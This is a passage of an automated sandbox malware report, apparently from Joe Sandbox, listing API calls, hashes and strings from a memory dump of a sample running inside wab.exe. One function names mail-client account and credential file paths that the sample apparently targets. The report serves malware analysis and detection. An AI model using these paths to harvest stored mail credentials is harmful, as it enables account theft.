                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                  • Instruction ID: 034eaa2abc6efd3f8ce9551a70e628b685e48af6d9c9a315db520ff222b8660e
                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                  • Instruction Fuzzy Hash: A811B131560B08FAD670ABB0CC4AFCB7BED9F10380F400864AB9A76052DA3EB4404F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 425 23668821-2366883a 426 23668850-23668855 425->426 427 2366883c-2366884c call 23669341 425->427 429 23668857-2366885f 426->429 430 23668862-23668886 MultiByteToWideChar 426->430 427->426 435 2366884e 427->435 429->430 432 2366888c-23668898 430->432 433 23668a19-23668a2c call 23662ada 430->433 436 236688ec 432->436 437 2366889a-236688ab 432->437 435->426 441 236688ee-236688f0 436->441 438 236688ad-236688bc call 2366bf20 437->438 439 236688ca-236688db call 236656d0 437->439 445 23668a0e 438->445 450 236688c2-236688c8 438->450 439->445 451 236688e1 439->451 444 236688f6-23668909 MultiByteToWideChar 441->444 441->445 444->445 448 2366890f-2366892a call 23665f19 444->448 449 23668a10-23668a17 call 23668801 445->449 448->445 457 23668930-23668937 448->457 449->433 454 236688e7-236688ea 450->454 451->454 454->441 458 23668971-2366897d 457->458 459 23668939-2366893e 457->459 461 2366897f-23668990 458->461 462 236689c9 458->462 459->449 460 23668944-23668946 459->460 460->445 463 2366894c-23668966 call 23665f19 460->463 465 23668992-236689a1 call 2366bf20 461->465 466 236689ab-236689bc call 236656d0 461->466 464 236689cb-236689cd 462->464 463->449 477 2366896c 463->477 468 23668a07-23668a0d call 23668801 464->468 469 236689cf-236689e8 call 23665f19 464->469 465->468 480 236689a3-236689a9 465->480 466->468 481 236689be 466->481 468->445 469->468 483 236689ea-236689f1 469->483 477->445 482 236689c4-236689c7 480->482 481->482 482->464 484 236689f3-236689f4 483->484 485 23668a2d-23668a33 483->485 486 236689f5-23668a05 WideCharToMultiByte 484->486 485->486 486->468 487 23668a35-23668a3c call 23668801 486->487 487->449
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,23666FFD,00000000,?,?,?,23668A72,?,?,00000100), ref: 2366887B
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,23668A72,?,?,00000100,5EFC4D8B,?,?), ref: 23668901
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 236689FB
                                                  • __freea.LIBCMT ref: 23668A08
                                                    • Part of subcall function 236656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23665702
                                                  • __freea.LIBCMT ref: 23668A11
                                                  • __freea.LIBCMT ref: 23668A36
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: 36f32b317f471e4d54faeee14c43403c76ae210cfb94bf5b9edf0bfc1d9fa726
                                                  • Instruction ID: ad84b7783f5762316638740ea4edbc2394acb82a88c0a70516883d288c00c64e
                                                  • Opcode Fuzzy Hash: 36f32b317f471e4d54faeee14c43403c76ae210cfb94bf5b9edf0bfc1d9fa726
                                                  • Instruction Fuzzy Hash: F1511372610206AFDB249E74CD40EAB37ADEF506D4F1806A9FE04D6180EB7CDC50CEA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • _strlen.LIBCMT ref: 23661607
                                                  • _strcat.LIBCMT ref: 2366161D
                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2366190E,?,?,00000000,?,00000000), ref: 23661643
                                                  • lstrcatW.KERNEL32(?,?), ref: 2366165A
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,2366190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23661661
                                                  • lstrcatW.KERNEL32(00001008,?), ref: 23661686
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrcatlstrlen$_strcat_strlen
                                                  • String ID:
                                                  • API String ID: 1922816806-0
                                                  • Opcode ID: 0f47e66445ca535d42602a5cba093863f053d03155a18a69b6b17492c4adab39
                                                  • Instruction ID: 676e8970712d270e98d497bfcf1de0e80183e70623f6659c464297cb55176dc4
                                                  • Opcode Fuzzy Hash: 0f47e66445ca535d42602a5cba093863f053d03155a18a69b6b17492c4adab39
                                                  • Instruction Fuzzy Hash: C221D336A00304ABCB119F64DC81AEE77BCEF99790F24445BE504EB185DB38A5428BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrcatW.KERNEL32(?,?), ref: 23661038
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2366104B
                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23661061
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23661075
                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23661090
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 236610B8
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AttributesFilelstrcat
                                                  • String ID:
                                                  • API String ID: 3594823470-0
                                                  • Opcode ID: 9c7b77d14a158726f76d4e8a33fd408766fbf564009fa87e18a6dd2b32090702
                                                  • Instruction ID: b1bbf40ec19144433db4aee96cfb7cbb6b2f48982d9aaf62dcb63850271291b5
                                                  • Opcode Fuzzy Hash: 9c7b77d14a158726f76d4e8a33fd408766fbf564009fa87e18a6dd2b32090702
                                                  • Instruction Fuzzy Hash: 9A217F35D00358ABCF60AF61DD48EDF376CEF94294F104296E959971A1DE389B86CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,23663518,236623F1,23661F17), ref: 23663864
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23663872
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2366388B
                                                  • SetLastError.KERNEL32(00000000,?,23663518,236623F1,23661F17), ref: 236638DD
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 02476719b0598c9daa9284d4c40837064a1998e588175fe4ffff05b276dc6620
                                                  • Instruction ID: 7613a7632245a3b2003ee3108851e296bb81f75a7ba8aaf690c40d4b7cb7a142
                                                  • Opcode Fuzzy Hash: 02476719b0598c9daa9284d4c40837064a1998e588175fe4ffff05b276dc6620
                                                  • Instruction Fuzzy Hash: 5401D8326097116EE3143A7AAD849962B6CEB757F473C02AEE130550F5EF1DC8014F88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,23666C6C), ref: 23665AFA
                                                  • _free.LIBCMT ref: 23665B2D
                                                  • _free.LIBCMT ref: 23665B55
                                                  • SetLastError.KERNEL32(00000000,?,?,23666C6C), ref: 23665B62
                                                  • SetLastError.KERNEL32(00000000,?,?,23666C6C), ref: 23665B6E
                                                  • _abort.LIBCMT ref: 23665B74
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: 5cc32c3271e5180f2cb103649398c7f75f1514ba8bb0044154410a773e4e40c2
                                                  • Instruction ID: fa2068709c4eaf6883c326b04a4d2ca36bea449203d7d0c4ab3c3b9aeb360ef1
                                                  • Opcode Fuzzy Hash: 5cc32c3271e5180f2cb103649398c7f75f1514ba8bb0044154410a773e4e40c2
                                                  • Instruction Fuzzy Hash: 7CF0A432544B01ABC32236356D1BE2E2A7D8FF15E1B3801A9FB14A6185FE2C89024D6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 23661E89: lstrlenW.KERNEL32(?,?,?,?,?,236610DF,?,?,?,00000000), ref: 23661E9A
                                                    • Part of subcall function 23661E89: lstrcatW.KERNEL32(?,?), ref: 23661EAC
                                                    • Part of subcall function 23661E89: lstrlenW.KERNEL32(?,?,236610DF,?,?,?,00000000), ref: 23661EB3
                                                    • Part of subcall function 23661E89: lstrlenW.KERNEL32(?,?,236610DF,?,?,?,00000000), ref: 23661EC8
                                                    • Part of subcall function 23661E89: lstrcatW.KERNEL32(?,236610DF), ref: 23661ED3
                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2366122A
                                                    • Part of subcall function 2366173A: _strlen.LIBCMT ref: 23661855
                                                    • Part of subcall function 2366173A: _strlen.LIBCMT ref: 23661869
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                  • API String ID: 4036392271-1520055953
                                                  • Opcode ID: 86b9326935aee1e2061776f91c131ef5eeaed135cacd364ef27a2e7e5171728d
                                                  • Instruction ID: 0d4685d44aed9adb58ef02b7e99f4470c8256bf72a02ff3f7598f45a7695fd4c
                                                  • Opcode Fuzzy Hash: 86b9326935aee1e2061776f91c131ef5eeaed135cacd364ef27a2e7e5171728d
                                                  • Instruction Fuzzy Hash: D62181B9E103086AEB2097A0EC81FED733DEF90B54F100596F604EB1D5EAB55D828B5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23664AEA,?,?,23664A8A,?,23672238,0000000C,23664BBD,00000000,00000000), ref: 23664B59
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23664B6C
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,23664AEA,?,?,23664A8A,?,23672238,0000000C,23664BBD,00000000,00000000,00000001,23662082), ref: 23664B8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 6122569c741ca9ff2d5fbe20356a22b74f47b30216d4217ce153d9c350092a18
                                                  • Instruction ID: 54dd6e54b75f7aaef572859b59e70aa010eece8a0a243708f9775c7e0f9462f1
                                                  • Opcode Fuzzy Hash: 6122569c741ca9ff2d5fbe20356a22b74f47b30216d4217ce153d9c350092a18
                                                  • Instruction Fuzzy Hash: B5F0AF31A00208BFCB12AF92C808FADBFBDEF18291F1401A9E905A2149DB3D8941CE94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 2366715C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2366717F
                                                    • Part of subcall function 236656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23665702
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 236671A5
                                                  • _free.LIBCMT ref: 236671B8
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 236671C7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 17abf5e82efb491a517063cf14b118c0dd59d7b310ce9a7299fd21f9cba0912c
                                                  • Instruction ID: 94c9aaed08a91b9d11cc9e95c2d26250a23ded8ec122fd07ef11e0f394117472
                                                  • Opcode Fuzzy Hash: 17abf5e82efb491a517063cf14b118c0dd59d7b310ce9a7299fd21f9cba0912c
                                                  • Instruction Fuzzy Hash: 0B0188726056157B63112EB74C4CD7BAE6DDBD2DE172801ABBE04C7244DA6D9C0189B8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000000,2366636D,23665713,00000000,?,23662249,?,?,23661D66,00000000,?,?,00000000), ref: 23665B7F
                                                  • _free.LIBCMT ref: 23665BB4
                                                  • _free.LIBCMT ref: 23665BDB
                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23665BE8
                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23665BF1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 4576588c2bee1762dc5db0b637213f13c2fc3cba54d117fc5a352006a7f4b7bf
                                                  • Instruction ID: a8ab7408e6f7b163adc27b011f7766d985d791429f1feed378615f61395094ae
                                                  • Opcode Fuzzy Hash: 4576588c2bee1762dc5db0b637213f13c2fc3cba54d117fc5a352006a7f4b7bf
                                                  • Instruction Fuzzy Hash: 64012836244B01BBC3123A355DA6D2F2A7DDBE25F077801EDFB15A6142EE6CD9024D6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,236610DF,?,?,?,00000000), ref: 23661E9A
                                                  • lstrcatW.KERNEL32(?,?), ref: 23661EAC
                                                  • lstrlenW.KERNEL32(?,?,236610DF,?,?,?,00000000), ref: 23661EB3
                                                  • lstrlenW.KERNEL32(?,?,236610DF,?,?,?,00000000), ref: 23661EC8
                                                  • lstrcatW.KERNEL32(?,236610DF), ref: 23661ED3
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$lstrcat
                                                  • String ID:
                                                  • API String ID: 493641738-0
                                                  • Opcode ID: 6713d69def9c2e68e219e30345d77251e4a839d77aadf35e5416186e7483c5cd
                                                  • Instruction ID: 5ef6a5268a44480052bf864833985de30d86fb4e969e560cf954b6a9cf4c8bf7
                                                  • Opcode Fuzzy Hash: 6713d69def9c2e68e219e30345d77251e4a839d77aadf35e5416186e7483c5cd
                                                  • Instruction Fuzzy Hash: 3AF089365006107AD7213F5BAC85E7F777CEFD6AE0B14001AF60883190DB5D58429AF9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 236691D0
                                                    • Part of subcall function 2366571E: HeapFree.KERNEL32(00000000,00000000,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?), ref: 23665734
                                                    • Part of subcall function 2366571E: GetLastError.KERNEL32(?,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?,?), ref: 23665746
                                                  • _free.LIBCMT ref: 236691E2
                                                  • _free.LIBCMT ref: 236691F4
                                                  • _free.LIBCMT ref: 23669206
                                                  • _free.LIBCMT ref: 23669218
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 69befd58ee5bf1e37c709dbeb94057a022df5e49c121d4d0fca18259ea81fa6e
                                                  • Instruction ID: f58c3826931bde592a76ffcae00f536676bb2cbe9b767372087461be486b565e
                                                  • Opcode Fuzzy Hash: 69befd58ee5bf1e37c709dbeb94057a022df5e49c121d4d0fca18259ea81fa6e
                                                  • Instruction Fuzzy Hash: 24F04471564244978628EA54D6CAD667FEDEB2069077C0885EB05D7904D62DF8804E9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 2366536F
                                                    • Part of subcall function 2366571E: HeapFree.KERNEL32(00000000,00000000,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?), ref: 23665734
                                                    • Part of subcall function 2366571E: GetLastError.KERNEL32(?,?,2366924F,?,00000000,?,00000000,?,23669276,?,00000007,?,?,23667E5A,?,?), ref: 23665746
                                                  • _free.LIBCMT ref: 23665381
                                                  • _free.LIBCMT ref: 23665394
                                                  • _free.LIBCMT ref: 236653A5
                                                  • _free.LIBCMT ref: 236653B6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9cfc7233b7c65b854117fa7edb10cdb4fce70e264efe8d480c529bf3a99db3c8
                                                  • Instruction ID: 6cffebcb4543a06d356e3d4a7c532f334c336a03275986d25ffc614110f4736f
                                                  • Opcode Fuzzy Hash: 9cfc7233b7c65b854117fa7edb10cdb4fce70e264efe8d480c529bf3a99db3c8
                                                  • Instruction Fuzzy Hash: E1F06D70C90215DB872A7F2589964283FBCE734AE03BD018AEA1097718F73C84028FC9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 23664C1D
                                                  • _free.LIBCMT ref: 23664CE8
                                                  • _free.LIBCMT ref: 23664CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                  • API String ID: 2506810119-3377118234
                                                  • Opcode ID: f173f0388a4d23d31632f93f8a52f6409c87e7ff2148589f060d994d0468ff7f
                                                  • Instruction ID: 8b122087b5d73e9e2beb43d2d65ebb2dc0db9afc40528b4dd64f2e5a6391dddd
                                                  • Opcode Fuzzy Hash: f173f0388a4d23d31632f93f8a52f6409c87e7ff2148589f060d994d0468ff7f
                                                  • Instruction Fuzzy Hash: A0319271B40318AFDB22EF998980D9EBBFCEF96790F2440D6E90497704D6798A41CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,23666FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 23668731
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 236687BA
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 236687CC
                                                  • __freea.LIBCMT ref: 236687D5
                                                    • Part of subcall function 236656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23665702
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: bc2077b9f83b9858161855c3949a576164116d7e1bd1830be204e17bc6965342
                                                  • Instruction ID: fc611a24e5e8bf2284c452b11293e3fcdd50cb657e191a09a53ce08af638ad70
                                                  • Opcode Fuzzy Hash: bc2077b9f83b9858161855c3949a576164116d7e1bd1830be204e17bc6965342
                                                  • Instruction Fuzzy Hash: EC31C132A0022AABDF249F75CC88DAF7BA9EB50390F1401A8ED04D7190E739D950CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(2366C7DD), ref: 2366C7E6
                                                  • GetModuleHandleA.KERNEL32(?,2366C7DD), ref: 2366C838
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 2366C860
                                                    • Part of subcall function 2366C803: GetProcAddress.KERNEL32(00000000,2366C7F4), ref: 2366C804
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID:
                                                  • API String ID: 1646373207-0
                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction ID: 12721bbf7154fbfcdc0d92276eb5ce4fa7b0d1cf3297adcb6e04ed3472fd8c91
                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                  • Instruction Fuzzy Hash: 1E010410645F4028A63062794D009AA5F9E9B236E0B1836DEA200C6093C95C85018BFD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23661D66,00000000,00000000,?,23665C88,23661D66,00000000,00000000,00000000,?,23665E85,00000006,FlsSetValue), ref: 23665D13
                                                  • GetLastError.KERNEL32(?,23665C88,23661D66,00000000,00000000,00000000,?,23665E85,00000006,FlsSetValue,2366E190,FlsSetValue,00000000,00000364,?,23665BC8), ref: 23665D1F
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23665C88,23661D66,00000000,00000000,00000000,?,23665E85,00000006,FlsSetValue,2366E190,FlsSetValue,00000000), ref: 23665D2D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: ceccb6926a41213823731040cafec82904059860e55b4327cdd25954aec69237
                                                  • Instruction ID: 426ec293263c4a075265ffcecb2471c4c01d390cf55f0bc18c363fcbae159c20
                                                  • Opcode Fuzzy Hash: ceccb6926a41213823731040cafec82904059860e55b4327cdd25954aec69237
                                                  • Instruction Fuzzy Hash: DC01F736611622BBC3116E6A8C4EE56379CEF056E17240661FB09D7186D72CD801CEE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 2366655C
                                                    • Part of subcall function 236662BC: IsProcessorFeaturePresent.KERNEL32(00000017,236662AB,00000000,?,?,?,?,00000016,?,?,236662B8,00000000,00000000,00000000,00000000,00000000), ref: 236662BE
                                                    • Part of subcall function 236662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 236662E0
                                                    • Part of subcall function 236662BC: TerminateProcess.KERNEL32(00000000), ref: 236662E7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
